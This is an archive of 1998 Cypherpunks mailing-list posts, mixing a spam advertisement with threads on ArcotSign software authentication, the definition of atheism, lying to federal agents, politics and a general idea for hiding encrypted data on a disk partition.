- ---> The fees cannot remain at the original level promised at the
beginning.

------------------------------







Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 21 Sep 1998 03:38:26 +0800
To: cypherpunks@cyberpass.net
Subject: Dilbert on Wearable Computing
Message-ID: <3.0.5.32.19980919140545.008d5740@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



Today's Dilbert is at  http://www.unitedmedia.com/comics/dilbert/ 
and if you access it after today, it'll be at

http://www.unitedmedia.com/comics/dilbert/archive/images/dilbert98091213518.gif



				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: befcorp@mail.ios.net
Date: Tue, 22 Sep 1998 18:16:59 +0800
To: <cypherpunks@toad.com>
Subject: advertisement
Message-ID: <199809222303.QAA06660@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



561 540 4028				       561 540 4028      
          


		   E MAIL KING AND ASSOCIATES
		  PUTS MONEY INTO YOUR POCKET!!

OUR COMPANY HAS OVER 3 YEARS PROVEN E MAIL BLASTING EXPERIENCE!

WORK SMARTER BY HAVING QUALIFIED PEOPLE PHONE YOU, ALREADY 
PREPARED TO BUY.

PUT YOUR COLD CALLING DAYS TO AN END.

TRY US OUT TODAY AND JUDGE THE RESULTS FOR YOURSELF! 10,000 E 
MAILS ARE ONLY $125.00 US.

Do you only market your product or service geographically? Not a 
problem with E Mail King. We can target your e-mail broadcastes 
into the city of your choosing!

FOR THOSE OF YOU WHO NEED MAILING CONTINOUSLY DONE, WE WILL E 
MAIL YOUR ADD TO 7500 DIFFERENT ADDRESSES DAILY MONDAY THROUGH 
FRIDAY MONTH AFTER MONTH FOR ONLY $250.00 PER MONTH. CALL TODAY 
FOR DETAILS ON THIS FANTASTIC OFFER!!

IF YOU ALREADY HAVE YOUR OWN E MAIL SYSTEM, WHY NOT TRY OUR 
SUBCRIPTION SERVICE WHERE YOU WILL RECEIVE 50,000 FRESH GOOD E 
MAIL ADDRESSES EVERY MONTH FOR ONLY $90.00.

ARE YOU INTERESTED IN BEING AN E MAIL KING RESELLER? PUT EVEN 
MORE MONEY INTO YOUR POCKET TODAY BY SIGNING UP WITH OUR PROGRAM 
TODAY!! IT DOES NOT COST ANYTHING TO JOIN!!

We accept Visa, Mastercard or Cheque by Fax.
	
James 
phone 561 540 4028

_________________________________________________________________



TO BE REMOVED FROM OUR LIST, email james456@indiasite.com and 
type in "remove" in the subject header or call (561)540 4028

our mailing address is 
EMAIL KING
1790 Bonhill Rd 
Mississauga Ontario
Canada



 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Fred C. Moulton" <moulton@moulton.com>
Date: Mon, 21 Sep 1998 00:32:06 +0800
To: cypherpunks@cyberpass.net
Subject: Re: atheism (was: RE: Democracy... (fwd)) (fwd)
Message-ID: <2.2.32.19980921053419.00a3a104@shell7.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain




To quote the The Encyclopedia of Philosophy (EOP):
   'No definition of "atheism" can hope to be in accord with all uses of
   this term."
The EOP article continues with a discussion of various definitions and
reasons for them.  The article includes the following comment:
   'On our definition, an "atheist" is a person who rejects belief in
    God, regardles of whether or not his reason for the rejection is 
    the claim that "God exists" is a fales proposition.'

George H. Smith in his book Atheism: The Case Against God writes:
    'Atheism, in its basic form, is not a belief: it is the absence
     of belief.  An atheist is not primarily a person who believes
     that a god does not exist; rather, he does not believe in the 
     existence of a god.'

Within the past year I attended a lecture by Mr. Smith and during the
lecture he indicated that his formulation was being preferred by
scholars in the field while the one given by Jim Choate was still
used in the popular culture.

Thus I think it is inappropriate to criticize the definition of 
atheism used by pjm@spe.com.

Fred

At 05:02 PM 9/20/98 -0500, Jim Choate wrote:
>Forwarded message:
>
>> From: pjm@spe.com
>> Date: Sun, 20 Sep 1998 20:13:38 +0200
>> Subject: atheism (was: RE: Democracy... (fwd)) (fwd)

>>      No, they are not.  The distinction is crucial to the main point I
>> evidently failed to make in my previous message:  Atheism is not a set
>> of beliefs that constitutes a personal philosophy.  There are Buddhist
>> atheists, Universalist-Unitarian atheists, objectivist atheists,
>> Wiccan atheists, etc.  Atheism isn't even a belief, it is merely the
>> statement of a lack of one particular belief.
>
>No, atheism is the statement that "God could exist, but doesn't". Whether
>one chooses to hang 'Bhuddism' or 'Wiccan' on is irrelevant. We aren't
>discussion labels but rather characteristics. Fundamentaly *ALL* atheism
>states:
>
>While it could happen that way, I don't believe it does.
>
>Which is identical in meaning to:
>
>While it could happen that way, I believe it doesn't.
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Mon, 21 Sep 1998 03:16:36 +0800
To: cypherpunks@cyberpass.net
Subject: This is a listed crime?
Message-ID: <199809210818.EAA08107@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



#   Bin Laden has suffered other setbacks recently. On Wednesday night, the
#   FBI arrested Wadih el Hage, an Arlington, Texas man who law enforcement
#   officials charge worked with bin Laden and Al-Din in Sudan, and with
#   Fazil in Kenya from 1994 to 1997. He has been charged with lying to the
#   FBI about his relationship with other bin Laden operatives, including a
#   senior bin Laden lieutenant who drowned in a 1996 ferryboat accident in
#   Tanzania.

Is "lying to the FBI" a law on the books, or is the actual
charge something else?
---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Mon, 21 Sep 1998 05:28:19 +0800
To: Adam Shostack <rdl@MIT.EDU>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.BSF.3.96.980920181732.10980B-100000@pakastelohi.cypherpunks.to>
Message-ID: <199809211030.FAA05159@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 06:27 AM 9/21/98 -0400, Adam Shostack wrote:
>On Sun, Sep 20, 1998 at 06:45:06PM +0200, Lucky Green wrote:
>| On Sat, 19 Sep 1998, Ryan Lackey wrote:
>| 
>| > 
>| > [from a discussion of tamper-resistant hardware for payment systems
>| > on dbs@philodox.com, a mailing list dedicated to digital bearer systems,
>
>| o ArcotSignTM technology is a breakthrough that offers smart card tamper
>| resistance in software. Arcot is unique in this regard, and WebFort is the
>| only software-only web access control solution on the market that offers
>| smart card security, with software convenience and cost. [We have now
>| entered deep snake oil territory. Claims that software affords tamper
>| resistance comparable to hardware tokens are either based in dishonesty or 
>| levels of incompetence in league with "just as secure pseudo-ontime
>| pads"].
>| 
>| In summary, based on the technical information provided by Arcot System,
>| the product is a software based authentication system using software based
>| client certificates.
>
>	I have no knowledge of Arcot's systems and can't comment on
>them.  Hoever, there are ways to make software hard o disassmeble
>and/or tamper with.  Given that Arcot is probably going to attack
>smartcards as being easily attacked, 'smartcard level' security is not 
>that high a target, the claim may not be so outlandish.

They're not looking to do tamperproof software.  Their business model can
be best described as: "better than passwords, cheaper than SecurID."

Here's the basic idea:  Strew a million passwords on your hard drive, and
make it impossible to verify which is the correct one offline.  So, someone
who steals the password file off the client cannot run a cracking tool
against the file.

>	Be intestesting to see how fast the code is.  If they're
>embedding certs in complex code that needs to run to sign, then theft
>of the cert may be difficult.

It isn't bad.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 21 Sep 1998 05:25:42 +0800
To: Lucky Green <rdl@MIT.EDU>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <199809192038.QAA29964@denmark-vesey.MIT.EDU>
Message-ID: <19980921062758.A3194@weathership.homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, Sep 20, 1998 at 06:45:06PM +0200, Lucky Green wrote:
| On Sat, 19 Sep 1998, Ryan Lackey wrote:
| 
| > 
| > [from a discussion of tamper-resistant hardware for payment systems
| > on dbs@philodox.com, a mailing list dedicated to digital bearer systems,

| o ArcotSignTM technology is a breakthrough that offers smart card tamper
| resistance in software. Arcot is unique in this regard, and WebFort is the
| only software-only web access control solution on the market that offers
| smart card security, with software convenience and cost. [We have now
| entered deep snake oil territory. Claims that software affords tamper
| resistance comparable to hardware tokens are either based in dishonesty or 
| levels of incompetence in league with "just as secure pseudo-ontime
| pads"].
| 
| In summary, based on the technical information provided by Arcot System,
| the product is a software based authentication system using software based
| client certificates.

	I have no knowledge of Arcot's systems and can't comment on
them.  Hoever, there are ways to make software hard o disassmeble
and/or tamper with.  Given that Arcot is probably going to attack
smartcards as being easily attacked, 'smartcard level' security is not 
that high a target, the claim may not be so outlandish.

	Be intestesting to see how fast the code is.  If they're
embedding certs in complex code that needs to run to sign, then theft
of the cert may be difficult.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 21 Sep 1998 07:09:50 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: This is a listed crime? (fwd)
Message-ID: <199809211236.HAA16397@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Information Security <guy@panix.com>
> Date: Mon, 21 Sep 1998 04:18:43 -0400 (EDT)
> Subject: This is a listed crime?

> Is "lying to the FBI" a law on the books, or is the actual
> charge something else?

Deliberately providing police incorrect information during an official
investigation is a crime. A person can answer the question truthfuly or else
they can refuse, lying is not an option. There is also the potential for
being charged as an accomplice.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 21 Sep 1998 07:12:13 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: atheism (was: RE: Democracy... (fwd)) (fwd)
Message-ID: <199809211240.HAA16457@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 20 Sep 1998 22:34:19 -0700
> From: "Fred C. Moulton" <moulton@moulton.com>
> Subject: Re: atheism (was: RE: Democracy... (fwd)) (fwd)

> Within the past year I attended a lecture by Mr. Smith and during the
> lecture he indicated that his formulation was being preferred by
> scholars in the field while the one given by Jim Choate was still
> used in the popular culture.
> 
> Thus I think it is inappropriate to criticize the definition of 
> atheism used by pjm@spe.com.

Well Fred you and pjm can believe what you wish, I fully support it.

However, yourself, pjm, & Mr. Smith are claiming that a belief that
something doesn't exist isn't a belief is simply a tricky play on semantics.
A belief in a negative is still a belief irrespective of how many people
believe it. Might doesn't make right (or logical).

As I've demonstrated before (and for the last time):

^(A) = (^A)

Argue all you want,

Yet it moves.

    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 21 Sep 1998 08:04:40 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Faith, logic, language, & history...
Message-ID: <199809211332.IAA16566@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Some have posited that the traditional way of looking at religion, logic,
and culture is false and that in fact a new methodology of examination has
been found.

What is happening is that some faction has decided to abandon 5000+ years of
human social and religous culture in favor of a new set of definitions.
These definitions use the traditional terminology in a new manner and in
addition invoke an alternate understanding of basic logic (ie 1st Order
Predicate Calculus).

To date no proof or demonstration, only an oft repeated claim, has been
forthcoming to demonstrate the short-fall in the traditional approach.

While the issues based on faith are clearly outside the purvue of rational
proof the invocation of alternate logics to back them up is not.

It falls on the current cadre of supporters to demonstrate two things:

1.  The shortfall in comprehension or understanding that occurs with the
    traditional approach

2.  How the new system addresses these shortcoming succsfully.

In short, if these folks really want us to believe their assertion:

^(A) <> (^A)

Then they need to demonstrate why De Morgans Law and other derivations of
this logical axiom are incorrect and how this alternate inversion identity
corrects these failures.

*IF* this can be accomplished then the remainder of their argument has some
basis in consideration.

The catch they don't seem to have seen is that when one inokes an empirical
philosophy in the support of a faith based philosophy it is done at the
behest and within the guidelines of the empirical philosophy. To do
otherwise is to change the rules in the middle of the game.

How many people believe it is irrelevant, how many books are written is
irrelevant. All that matters is demonstrating the proof within the boundary
conditions. It is not an issue of personality or popularity.

Myself, I don't believe they can do it. Computers work, crypto works, man
got to the moon, medicine works, airplanes fly, etc., etc., etc.

As the saying goes, the proof is in the pudding. It's time these folks got
their butts in the kitchen.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Todd S. Glassey" <TSGman@earthlink.net>
Date: Mon, 21 Sep 1998 10:47:42 +0800
To: "Bruce Schneier" <rdl@MIT.EDU>
Subject: RE: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <199809211030.FAA05159@mixer.visi.com>
Message-ID: <003701bde576$9858f3f0$200aa8c0@tsg-laptop>
MIME-Version: 1.0
Content-Type: text/plain



Hey Bruce,
doesn't this response of yours imply that the OS is what is comprimised?,
that either the access models and control of the File System on the target
system (that is the one with the million PW's strewn about the disk file
system) is setup wrong or is just not functional. Otherwise why would I want
to take up critical disk space with a management process that had to manage
a million disk-based entities.

Oh and BTW - a simple runtime profiler (i.e. most of the runtime debuggers
will suffice if they have trace capability) will crack which password is the
right one, and I don't even need physical access to the machine to run it in
Microsoft Land. Now if they used the CertCo model and split the key/pw into
several sections and signed or encrypted them separately so that essentially
you have a holographic PW its harder, but the Runtime Profiler is still
capable of creating havoc in this model, I think.

That is exactly the point why SW alone solutions cannot provide the levels
of trust that some forms of commerce require. If the OS is untrustworthy and
you have to replicate the components of the system to confuse an intruder as
to which is the "active entitiy"... then whats to stop the same person from
building a sleeper or coopting the User Memory Space. It seems to me that
this effort will just stop people that are cruising through others
filespaces in search of gold.

As far as commercial trust models are concerned this solution, IMHO, is less
than desirable and in some instances covers up but does not fix, various
liability models for a complete system.

It seems to me (standard disclaimers apply here), that in the real world,
the best way to operate is to trust no one,  not your OS, not your ISP, and
especially not your own people. What that mandates is that there is some
"anchor process" that binds both policy and the systems that implement it to
the firmament. I believe that this is the key to making tools like CDSA and
others (OpSec) more functional. Besides, Imagine the strength of an audit
process based upon one of these immutable policy anchors.

Todd


> -----Original Message-----
> From: dbs@philodox.com [mailto:dbs@philodox.com]On Behalf Of Bruce
> Schneier
> Sent: Monday, September 21, 1998 3:27 AM
> To: Adam Shostack; Lucky Green; Ryan Lackey
> Cc: scott@loftesness.com; dbs@philodox.com; coderpunks@toad.com;
> cryptography@c2.net; cypherpunks@algebra.com
> Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
>
>
> At 06:27 AM 9/21/98 -0400, Adam Shostack wrote:
> >On Sun, Sep 20, 1998 at 06:45:06PM +0200, Lucky Green wrote:
> >| On Sat, 19 Sep 1998, Ryan Lackey wrote:
> >|
> >| >
> >| > [from a discussion of tamper-resistant hardware for payment systems
> >| > on dbs@philodox.com, a mailing list dedicated to digital
> bearer systems,
> >
> >| o ArcotSignTM technology is a breakthrough that offers smart
> card tamper
> >| resistance in software. Arcot is unique in this regard, and
> WebFort is the
> >| only software-only web access control solution on the market
> that offers
> >| smart card security, with software convenience and cost. [We have now
> >| entered deep snake oil territory. Claims that software affords tamper
> >| resistance comparable to hardware tokens are either based in
> dishonesty or
> >| levels of incompetence in league with "just as secure pseudo-ontime
> >| pads"].
> >|
> >| In summary, based on the technical information provided by
> Arcot System,
> >| the product is a software based authentication system using
> software based
> >| client certificates.
> >
> >	I have no knowledge of Arcot's systems and can't comment on
> >them.  Hoever, there are ways to make software hard o disassmeble
> >and/or tamper with.  Given that Arcot is probably going to attack
> >smartcards as being easily attacked, 'smartcard level' security is not
> >that high a target, the claim may not be so outlandish.
>
> They're not looking to do tamperproof software.  Their business model can
> be best described as: "better than passwords, cheaper than SecurID."
>
> Here's the basic idea:  Strew a million passwords on your hard drive, and
> make it impossible to verify which is the correct one offline.
> So, someone
> who steals the password file off the client cannot run a cracking tool
> against the file.
>
> >	Be intestesting to see how fast the code is.  If they're
> >embedding certs in complex code that needs to run to sign, then theft
> >of the cert may be difficult.
>
> It isn't bad.
>
> Bruce
> **********************************************************************
> Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
> 101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
>            Free crypto newsletter.  See:  http://www.counterpane.com
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Mon, 21 Sep 1998 11:31:20 +0800
To: cypherpunks@cyberpass.net
Subject: Satellite phones and Net-connections: new space race (fwd)
Message-ID: <Pine.GSO.3.95.980921093147.23903E-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Mon, 21 Sep 1998 09:31:30 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: Satellite phones and Net-connections: new space race

I can't give you a URL to my satellite article in this week's Time
magazine; it won't be on our web site for another week. 

---

Time Magazine
September 28, 1998
Pages B18-B22

  The Super-Cell
  By Declan McCullagh

  The Iridium consortium and rival joint ventures are closing in on their
  goal of making sat phones into multibillion-dollar mainstays of the
  info-superhighway

---

Also worth checking out is an article by Tamala Edwards on the Vermont
Senate race, in which an honest-to-goodness 79-year old dairy farmer is
running against incumbent Dem Patrick Leahy. You'll remember Leahy is the
architect of the Digital Telephony wiretapping law, but was also a vocal
opponent of the CDA. 

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Mon, 21 Sep 1998 11:48:20 +0800
To: "Reeza!" <howree@cable.navy.mil>
Subject: Re: Clinton's fake apologies (fwd)
In-Reply-To: <3.0.5.32.19980920152605.0086ba30@205.83.192.13>
Message-ID: <360683E5.26C6@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Reeza! wrote:
> In case you hadn't noticed, the investigation of him, vis-a-vis the rules
> established by other demicans, his supposed compatriates, is still ongoing.
> 
> Methinks this is just the tip of the iceberg, a bone for the populace to
> chew on so that when the rest of the story breaks, we (the dog) won't
> notice the prime rib and sirloin.
> 
Completely illogical. Give me one good reason not to lead with your best
punch? I suspect Starr's work is voluminous but weak on all other counts
so he led with what would create the most publicity. I've said that I'm
no great fan of Clinton's but this entire investigation is blatantly
partisan and has brought the political process in this country about as
low as it is possible to bring it. 

Starr's base approach to justice is the opening shot of what I hope
turns into an all-out scorched-earth battle. Let 'em all fall down. I'm
just afraid that when it's over the only people who will be willing to
run for public office will be truly dangerous people who have no respect
for liberty not of their own definition.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Mon, 21 Sep 1998 12:05:07 +0800
To: Information Security <guy@panix.com>
Subject: Re: This is a listed crime?
In-Reply-To: <199809210818.EAA08107@panix7.panix.com>
Message-ID: <360687E1.2F94@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Information Security wrote:
> 
> #   Bin Laden has suffered other setbacks recently. On Wednesday night, the
> #   FBI arrested Wadih el Hage, an Arlington, Texas man who law enforcement
> #   officials charge worked with bin Laden and Al-Din in Sudan, and with
> #   Fazil in Kenya from 1994 to 1997. He has been charged with lying to the
> #   FBI about his relationship with other bin Laden operatives, including a
> #   senior bin Laden lieutenant who drowned in a 1996 ferryboat accident in
> #   Tanzania.
> 
> Is "lying to the FBI" a law on the books, or is the actual
> charge something else?
> ---guy
Not in my book but look very carefully at INS law. It may have to do
with documentation generated during his admission to the country rather
than after. INS law, to a nonlawyer, looks like the Constitution can be
held at arm's length. Still sounds pretty shaky. After all, who
remembers everything? I can't even remember what I had for supper last
night no less the names of all the people I've worked with in the last
few years.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 21 Sep 1998 09:46:18 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: This is a listed crime? (fwd)
In-Reply-To: <199809211236.HAA16397@einstein.ssz.com>
Message-ID: <199809211446.KAA16321@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:36 AM 9/21/98 -0500, Jim Choate wrote:
>Forwarded message:
>
>> From: Information Security <guy@panix.com>
>> Date: Mon, 21 Sep 1998 04:18:43 -0400 (EDT)
>> Subject: This is a listed crime?
>
>> Is "lying to the FBI" a law on the books, or is the actual
>> charge something else?
>
>Deliberately providing police incorrect information during an official
>investigation is a crime. A person can answer the question truthfuly or else
>they can refuse, lying is not an option. There is also the potential for
>being charged as an accomplice.

In fact some authorities thought that you could give an "exculpatory no"
answer to questions without being guilty of Obstruction of Justice.  "Did
you accept a bribe from the Chinese, Mr. Clinton." "No."  But last year the
Supremes held that even "exculpatory noes" can be Obstruction so the better
answer (as it always has been) is "Get out of my face G-Man I don't have to
talk to scum like you."  (Or words to that effect).

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Mon, 21 Sep 1998 13:23:45 +0800
To: attila <attila@hun.org>
Subject: Re: This is a listed crime?
In-Reply-To: <Pine.BSF.3.96.980921142104.397Q-100000@hun.org>
Message-ID: <360699DC.7BB4@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> if nothing else, such as
>   telling a federal agent to fuck-off, they will charge you with
>   obstruction of justice.
> 
Not too long ago the New York State Court of Appeals struck down some
local ordinance outlawing public profanity stating that it was
unconstitutional. Looks like not all courts are enemies of the Bill of
Rights. Bottom line is that you can say 'Fuck You' in New York. That's
not to say that some tallboot won't abuse his power and crack your skull
or set you up if you dis him.

>   dont want to take the time to look up the 18 USC reference, but
>   providing deliberately false information to _any_ federal agent
>   is a felony--  that includes the IRS.
>
Perhaps you could deliberately mislead them without actually
representing the information as true. Would these disclaimers indicate
that the following information is not suitable for any purpose and that
the provider takes no responsibility for any confusion resulting from
the use of the information? Like a Microsoft software license. A
tail-light warranty for the spoken spam.

I heard that ...
I believe that ...
In my opinion ...
I'm not sure ...
I don't recall exactly ...
I think you should consider looking into ...
It is possible that ...
I thought that ...
What if ...
Didn't he once ...

Or use these:

I'm truly, truly sorry I can't help you. Would you like some more
coffee?
Piss off.

>     silence             obstruction of justice
>
Silence is allowed, 5th ammendment. Where in the BOR does it say that
this only applies under oath in a court of law?

>     false information   lying to a federal agent in course of ...
> 
Golly, can't lie under oath, can't lie not under oath. Can't just be
quiet. I guess they win. Justice prevails.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 21 Sep 1998 10:57:19 +0800
To: "Me Michel Kelly-Gagnon" <Alexdoulis@aol.com>
Subject: [short] Updated quote from Allan Rock
Message-ID: <199809211555.LAA10768@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain



This is the complete quote from Alan Rock, then justice minister who pushed 
the gun control, registration and confiscation bill (C-68).


"I came to Ottawa with the firm belief that the only people in this
country who should have guns are police officers and soldiers."

-- Allan Rock, Canada's Minister of Justice, quoted in _Maclean's_
        "Taking Aim on Guns", April 25, 1994, page 12.


"... protection of life is NOT a legitimate use for a firearm 
     in this country sir! Not! That is expressly ruled out!". 
 
  Justice Minister Allan Rock
  "Canadian justice issues, a town hall meeting"
  Producer - Joanne Levy,   
  Shaw cable, Calgary (403) 250-2885
  Taped at the Triwood community centre in Calgary Dec.1994 




Jean-Francois Avon, B.Sc. Physics, Montreal, Canada

  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Mon, 21 Sep 1998 11:55:38 +0800
To: "Todd S. Glassey" <rdl@MIT.EDU>
Subject: RE: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <199809211030.FAA05159@mixer.visi.com>
Message-ID: <199809211656.LAA18134@mixer.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:43 AM 9/21/98 -0700, Todd S. Glassey wrote:
>Hey Bruce,
>doesn't this response of yours imply that the OS is what is comprimised?,
>that either the access models and control of the File System on the target
>system (that is the one with the million PW's strewn about the disk file
>system) is setup wrong or is just not functional. Otherwise why would I want
>to take up critical disk space with a management process that had to manage
>a million disk-based entities.

It's not that much disk space.  The million entries was a methphor.  They use
mathematics instead of raw disk storage.

>Oh and BTW - a simple runtime profiler (i.e. most of the runtime debuggers
>will suffice if they have trace capability) will crack which password is the
>right one, and I don't even need physical access to the machine to run it in
>Microsoft Land. Now if they used the CertCo model and split the key/pw into
>several sections and signed or encrypted them separately so that essentially
>you have a holographic PW its harder, but the Runtime Profiler is still
>capable of creating havoc in this model, I think.

Of course.  It's less secure than hardware solutions.

>That is exactly the point why SW alone solutions cannot provide the levels
>of trust that some forms of commerce require. If the OS is untrustworthy and
>you have to replicate the components of the system to confuse an intruder as
>to which is the "active entitiy"... then whats to stop the same person from
>building a sleeper or coopting the User Memory Space. It seems to me that
>this effort will just stop people that are cruising through others
>filespaces in search of gold.

Agreed.  Think of AOL as the ideal user for this idea.  They want something
a little more secure than passwords, but don't want to spend the money on
hardware.  Passwords can be guessed, or sniffed.  This system doesn't
allow passwords to be guessed, and there are some more additions to 
prevent sniffing (all pretty standard).  Sure, if the client machine is
compromised (installing a sniffer, etc), there is no security, but that's not
the real threat.

>As far as commercial trust models are concerned this solution, IMHO, is less
>than desirable and in some instances covers up but does not fix, various
>liability models for a complete system.

Sure.  But it's good enough for some things.

>It seems to me (standard disclaimers apply here), that in the real world,
>the best way to operate is to trust no one,  not your OS, not your ISP, and
>especially not your own people. What that mandates is that there is some
>"anchor process" that binds both policy and the systems that implement it to
>the firmament. I believe that this is the key to making tools like CDSA and
>others (OpSec) more functional. Besides, Imagine the strength of an audit
>process based upon one of these immutable policy anchors.

That's not the best way to operate in the real world.  I'd much rather have
friends, get married, and have a fun life than to trust no one.  I'd much
rather
take the occassional hit rather than sit alone in the dark holding a gun.
This
is the real world of ninny net users in chat rooms, this isn't online real
estate.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Mon, 21 Sep 1998 14:18:02 +0800
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Stego-empty hard drives...
In-Reply-To: <v04011743b229a12c2f0b@[139.167.130.247]>
Message-ID: <3606A3B8.5B33@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hettinga wrote:
> Stegoing an encrypted partition as "blank" hard drive space without
> actually writing over it unless you wanted to?
> 
A freshly formatted partition has a fill value. Noise would indicate
that is is not fresh. This would not be proof that it contained
encrypted data but it would indicate some sort of use. 

Another layer: 
	create a partition. 
	Use it as an archive for 'unclassified' materials. 
	At some point after the use has fragmented it enough to look real:
		disable all automatic accesses ( temp files, caches ... ) to the
partition
		create an application program that uses the unused space as a secure
filesystem

Then the partition would be arguably "in normal use" and it could get
tough to prove the nature of the unused space. You could even leave some
space filled with the format fill value. Not sure how to hide the app.
maybe as passphrased option in some innocuous custom application.
Accounting app?

The possibility of them taking a hash and saving it for later comparison
is a problem.

> Stegoing an encrypted partition as not even *there* at all?
> 
Just do a drive ID command and you can figure out how many logical
sectors are there. Add up the elements in the partition table and look
for a difference. Unused space -esp that filled with noise- is suspect. 

> Obviously, even if the partition were found, it would look, to sniffer
> programs, as if it were empty, right? :-).
> 
Just the existence of a "hidden" partition might might get the juices
flowing.

*************************************************************************************************

It would be truly beautiful if you could alter the drive firmware to
